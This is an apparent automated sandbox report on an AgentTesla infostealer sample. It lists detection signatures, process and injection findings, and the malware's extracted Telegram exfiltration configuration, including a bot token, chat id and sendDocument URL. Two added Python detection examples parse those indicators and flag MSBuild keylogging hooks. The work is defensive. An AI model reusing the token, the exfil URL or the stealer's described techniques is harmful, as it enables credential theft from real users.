
Windows Analysis Report
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
Analysis ID: 620228
MD5: 5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
SHA1: 1a115c8a1761ef2a2cf61d854d1d2c201c902d53
SHA256: 31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign process
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ykVBUY.exe (PID: 5256, cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe", MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 1408, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ykVBUY.exe (PID: 2976, cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe", MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 3264, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Only the two ykVBUY.exe instances (the persistence copy dropped under AppData\Roaming) survive in this extract of the tree; the submitted sample (process 0) and the MSBuild.exe instance into which the payload was injected (process 9), which the signatures below refer to, are not listed here.

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
Yara matches on memory dumps (Source | Rule | Description | Author):

00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(22 entries in total; the first five are shown)

Yara matches on unpacked PEs (Source | Rule | Description | Author | Strings):

9.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
9.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
9.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen | matched strings:
  • 0x32e84: $s10 "logins"
  • 0x328eb: $s11 "credential"
  • 0x2ed14: $g1 "get_Clipboard"
  • 0x2ed22: $g2 "get_Keyboard"
  • 0x2ed2f: $g3 "get_Password"
  • 0x300eb: $g4 "get_CtrlKeyDown"
  • 0x300fb: $g5 "get_ShiftKeyDown"
  • 0x3010c: $g6 "get_AltKeyDown"
9.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
9.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(25 entries in total; the first five are shown)
                    No Sigma rule has matched
                    No Snort rule has matched


                    AV Detection

Source: 9.0.MSBuild.exe.400000.4.unpack | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.6260.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | ReversingLabs: Detection: 26%
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Joe Sandbox ML: detected
Source: 9.0.MSBuild.exe.400000.0.unpack, 9.0.MSBuild.exe.400000.1.unpack, 9.0.MSBuild.exe.400000.2.unpack, 9.0.MSBuild.exe.400000.3.unpack, 9.0.MSBuild.exe.400000.4.unpack, 9.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb | Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD | Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
Both PDB paths are the build path of Microsoft's own MSBuild.exe. The string shows up in the image region of the dropped ykVBUY.exe (ykVBUY.exe.9.dr, i.e. dropped by process 9), which suggests the persistence copy is the MSBuild image itself; the path says nothing about where the malware was built.

                    Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected (request headers as captured; note the absence of a User-Agent header):
  POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
  Host: api.telegram.org
  Content-Length: 754
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 to and from local ports 49717, 49741, 49743, 49748 and 49768
Source: unknown | TCP traffic detected without corresponding DNS query, by destination (number of flagged connections in parentheses): 131.253.33.200 (12), 40.126.31.4 (12), 93.184.220.29 (10), 8.248.119.254 (7), 67.26.81.254 (2), 13.248.245.213 (1), 142.250.203.110 (1)
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi (adjacent string-table entries of the credential-harvesting module: DynDNS updater and Psi/Psi+ XMPP client account fields)
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://UhwhaG.com
Source: MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory (all type-foundry and font-licence URLs of the kind carried by embedded font resources; they are not network indicators):
  • http://fontfabrik.com
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-user.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/
The same URL sits both in the submitted sample's heap and in MSBuild.exe's image region at 0x402000, consistent with the injected-PE signatures listed above.
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www (string truncated as captured)
Source: unknown | HTTP traffic detected: POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1, Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c, Host: api.telegram.org, Content-Length: 754, Expect: 100-continue, Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
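The report recovers the Telegram exfil configuration from memory (the bot token carried in the URL path, the chat id, the sendDocument and sendMessage methods) and flags the POST above for having no User-Agent. The Python below is an added example, not Joe Sandbox's extractor or anything from the report: it pulls those indicators out of a raw memory dump (checking both the byte-for-byte view and the UTF-16LE view, since .NET keeps its strings as UTF-16) and scores one captured HTTP request. The memory fragment and the multipart body are constructed here from the URLs and headers the report shows (the report gives only the Content-Length of the body); the regexes, rule names and scoring threshold are this example's own.

```python
import re
from typing import Dict, List

# Telegram Bot API tokens look like <numeric bot id>:<35 chars of [A-Za-z0-9_-]>, and the
# report shows the exfil URL built as https://api.telegram.org/bot<token>/<method>.
TOKEN_RE = re.compile(r"bot(\d{6,12}:[A-Za-z0-9_-]{35})")
API_URL_RE = re.compile(r"https?://api\.telegram\.org/bot\d{6,12}:[A-Za-z0-9_-]{35}/([A-Za-z]+)")
# chat_id as it appears inside a multipart/form-data part: part header, blank line, value.
CHAT_ID_RE = re.compile(r'name="chat_id"\r?\n\r?\n(-?\d{5,14})')


def _text_views(blob: bytes) -> List[str]:
    """Byte-transparent latin-1 view plus both UTF-16LE alignments (.NET strings are UTF-16)."""
    return [
        blob.decode("latin-1"),
        blob.decode("utf-16-le", errors="ignore"),
        blob[1:].decode("utf-16-le", errors="ignore"),
    ]


def extract_telegram_config(blob: bytes) -> Dict[str, List[str]]:
    """Pull bot tokens, API methods and chat ids out of a raw memory dump or strings output."""
    tokens, methods, chat_ids = set(), set(), set()
    for text in _text_views(blob):
        tokens.update(TOKEN_RE.findall(text))
        methods.update(API_URL_RE.findall(text))
        chat_ids.update(CHAT_ID_RE.findall(text))
    return {"tokens": sorted(tokens), "methods": sorted(methods), "chat_ids": sorted(chat_ids)}


def classify_request(raw: bytes) -> Dict[str, object]:
    """Score one raw HTTP request against the Telegram exfil pattern captured in the report."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (line.split(":", 1) for line in lines[1:] if ":" in line)}
    token = TOKEN_RE.search(path)
    reasons = []
    if headers.get("host", "").lower() == "api.telegram.org" and token:
        reasons.append("bot-api-token-in-path")
    if method == "POST" and path.endswith("/sendDocument"):
        reasons.append("file-upload-to-telegram")
    if "user-agent" not in headers:  # the report flags "HTTP GET or POST without a user agent"
        reasons.append("no-user-agent")
    return {
        "suspicious": len(reasons) >= 2,
        "reasons": reasons,
        "token": token.group(1) if token else None,
        "chat_ids": CHAT_ID_RE.findall(body.decode("latin-1")),
    }


# Constructed memory-dump fragment: the Telegram URLs the report recovered from memory, one of
# them stored UTF-16LE as .NET would, surrounded by binary noise.
URL_BASE = b"https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/"
SAMPLE_DUMP = (
    b"\x00" * 16
    + URL_BASE + b"\x00"
    + b"\x90\x90\xff\xfe"
    + (URL_BASE + b"sendDocument").decode("latin-1").encode("utf-16-le")
    + b"\x00\x00MZ\x90\x00"
    + URL_BASE + b"sendMessage\x00"
)

# Header lines copied from the report's captured POST; the multipart body is constructed
# (the report shows only Content-Length: 754), so its layout is an assumption.
SAMPLE_REQUEST = (
    b"POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c\r\n"
    b"Host: api.telegram.org\r\n"
    b"Content-Length: 754\r\n"
    b"Expect: 100-continue\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"-----------------------------8da2ddf8401560c\r\n"
    b'Content-Disposition: form-data; name="chat_id"\r\n\r\n1131810225\r\n'
    b"-----------------------------8da2ddf8401560c\r\n"
    b'Content-Disposition: form-data; name="document"; filename="document.html"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n<html>...</html>\r\n"
    b"-----------------------------8da2ddf8401560c--\r\n"
)

if __name__ == "__main__":
    print(extract_telegram_config(SAMPLE_DUMP))
    print(classify_request(SAMPLE_REQUEST))
```

The token is the operator's credential for the bot, so it is the indicator to pivot on (and to report to Telegram); the bot id before the colon stays stable even if the operator rotates the secret. The UTF-16 pass matters on the `.sdmp` dumps above: a plain `strings` run over a .NET heap misses every managed string unless it is told to look for wide characters.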

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_0687B0F8 SetWindowsHookExW 0000000D,00000000,?,? (idHook 0x0D = WH_KEYBOARD_LL; installed system-wide, per the "Installs a global keyboard hook" signature)
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window created: window name: CLIPBRDWNDCLASS

                    Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts
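The keyboard hook, the clipboard window and the hosts-file write above all come from MSBuild.exe, a signed Microsoft build tool that has no reason to do any of them, and the report notes that no Sigma rule matched. The Python below is an added example, not Joe Sandbox's or the report's own logic, of the host-side rule a detection engineer would run over process telemetry: it decodes the SetWindowsHookEx idHook value (0x0D is WH_KEYBOARD_LL) and flags a .NET Framework tool that installs a global input hook, registers a CLIPBRDWNDCLASS window, or writes drivers\etc\hosts. The event schema and PIDs are constructed for the example, and the RegSvcs, RegAsm and InstallUtil entries are an assumption that extends the list beyond the one host this report shows.

```python
import ntpath
from typing import Dict, Iterable, List

# idHook values for SetWindowsHookEx (winuser.h); 0x0D is what the report shows MSBuild.exe pass.
WINDOWS_HOOKS = {
    -1: "WH_MSGFILTER", 0: "WH_JOURNALRECORD", 1: "WH_JOURNALPLAYBACK", 2: "WH_KEYBOARD",
    3: "WH_GETMESSAGE", 4: "WH_CALLWNDPROC", 5: "WH_CBT", 6: "WH_SYSMSGFILTER", 7: "WH_MOUSE",
    8: "WH_HARDWARE", 9: "WH_DEBUG", 10: "WH_SHELL", 11: "WH_FOREGROUNDIDLE",
    12: "WH_CALLWNDPROCRET", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL",
}
INPUT_HOOKS = {"WH_KEYBOARD", "WH_KEYBOARD_LL", "WH_MOUSE_LL", "WH_JOURNALRECORD"}

# .NET Framework tools that have no business keylogging or editing the hosts file.
# msbuild.exe is the host in this report; the other three are an assumption (same abuse pattern).
FRAMEWORK_TOOLS = {"msbuild.exe", "regsvcs.exe", "regasm.exe", "installutil.exe"}
HOSTS_FILE = r"c:\windows\system32\drivers\etc\hosts"
HIGH_SEVERITY_PREFIXES = ("framework-tool-global-", "framework-tool-writes-hosts")


def hook_name(id_hook: int) -> str:
    return WINDOWS_HOOKS.get(id_hook, f"WH_UNKNOWN({id_hook})")


def is_framework_tool(image: str) -> bool:
    image = image.lower()
    return ntpath.basename(image) in FRAMEWORK_TOOLS and r"\microsoft.net\framework" in image


def evaluate(event: Dict[str, object]) -> List[str]:
    """Return the names of the rules one telemetry event trips (empty list = nothing to see)."""
    if not is_framework_tool(str(event.get("image", ""))):
        return []
    kind = event.get("type")
    if kind == "set_windows_hook":
        name = hook_name(int(event["id_hook"]))
        # dwThreadId 0 hooks every thread on the desktop: a system-wide keylogger, not a UI tweak
        if name in INPUT_HOOKS and int(event.get("thread_id", 0)) == 0:
            return [f"framework-tool-global-{name.lower()}"]
    elif kind == "file_write" and str(event.get("path", "")).lower() == HOSTS_FILE:
        return ["framework-tool-writes-hosts"]
    elif kind == "window_create" and event.get("class") == "CLIPBRDWNDCLASS":
        return ["framework-tool-clipboard-window"]
    return []


def severity(hits: List[str]) -> str:
    if any(h.startswith(HIGH_SEVERITY_PREFIXES) for h in hits):
        return "high"
    return "low" if hits else "none"


def triage(events: Iterable[Dict[str, object]]) -> Dict[int, List[str]]:
    """Group rule hits per PID so one injected MSBuild.exe surfaces as a single finding."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        for hit in evaluate(ev):
            findings.setdefault(int(ev["pid"]), []).append(hit)
    return findings


# Constructed telemetry modelled on the report's hook, clipboard-window and hosts-file findings.
# The field names and PIDs are this example's own, not a Sysmon or Joe Sandbox schema.
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    {"type": "set_windows_hook", "pid": 4284, "image": MSBUILD, "id_hook": 0x0D, "thread_id": 0},
    {"type": "window_create", "pid": 4284, "image": MSBUILD, "class": "CLIPBRDWNDCLASS"},
    {"type": "file_write", "pid": 4284, "image": MSBUILD, "path": r"C:\Windows\System32\drivers\etc\hosts"},
    # benign noise: a real build writing its log, and explorer.exe owning a clipboard window
    {"type": "file_write", "pid": 4711, "image": MSBUILD, "path": r"C:\proj\obj\build.log"},
    {"type": "window_create", "pid": 1234, "image": r"C:\Windows\explorer.exe", "class": "CLIPBRDWNDCLASS"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, severity(hits), hits)
```

CLIPBRDWNDCLASS is the window OLE creates when a process touches the clipboard, so many benign .NET and Office processes own one; that is why it is only a low-severity corroborating signal here, while the global WH_KEYBOARD_LL hook and the hosts-file write carry the verdict on their own.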

                    System Summary

Matched rule: AgentTeslaV3 infostealer payload (Author: ditekSHen) on the following unpacked PEs (type: UNPACKEDPE):
  • 9.2.MSBuild.exe.400000.0.unpack
  • 9.0.MSBuild.exe.400000.1.unpack
  • 9.0.MSBuild.exe.400000.3.unpack
  • 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack
  • 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack
  • 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack
  • 9.0.MSBuild.exe.400000.2.unpack
  • 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack
  • 9.0.MSBuild.exe.400000.4.unpack
  • 9.0.MSBuild.exe.400000.0.unpack
Source: 9.0.MSBuild.exe.400000.0.unpack, 9.0.MSBuild.exe.400000.1.unpack, 9.0.MSBuild.exe.400000.2.unpack, 9.0.MSBuild.exe.400000.3.unpack, 9.0.MSBuild.exe.400000.4.unpack, 9.2.MSBuild.exe.400000.0.unpack, <PrivateImplementationDetails>{E1A600D2-F5A3-4320-A658-390D97B8B6B8}/7EDCC754-59E4-4EB9-BAC0-ED1F3A681E9E.cs | Large array initialization: .cctor: array initializer size 11729
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Matched rule: MALWARE_Win_AgentTeslaV3 (author = ditekSHen, description = AgentTeslaV3 infostealer payload) on the same ten unpacked PEs listed above (type: UNPACKEDPE).
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code functions: 0_2_0325C344, 0_2_0325E760, 0_2_0325E770, 0_2_07CA0040, 0_2_07CA0021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code functions: 9_2_0121F400, 9_2_0121F748, 9_2_067D6678, 9_2_067D5C88, 9_2_067DBB18, 9_2_067DCF08, 9_2_067DBD38, 9_2_067FC640, 9_2_067F62F0, 9_2_067FDEA0, 9_2_067F3F58, 9_2_067FAF18, 9_2_067F03D8, 9_2_067F7918, 9_2_067F0374, 9_2_067F4405, 9_2_068745E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068722D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068757A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06876490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06870040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06872B80
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D118C0
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D151F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D12370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D128A9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B2370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B51F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B1A2F
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322647809.00000000048F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.325563619.0000000007AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
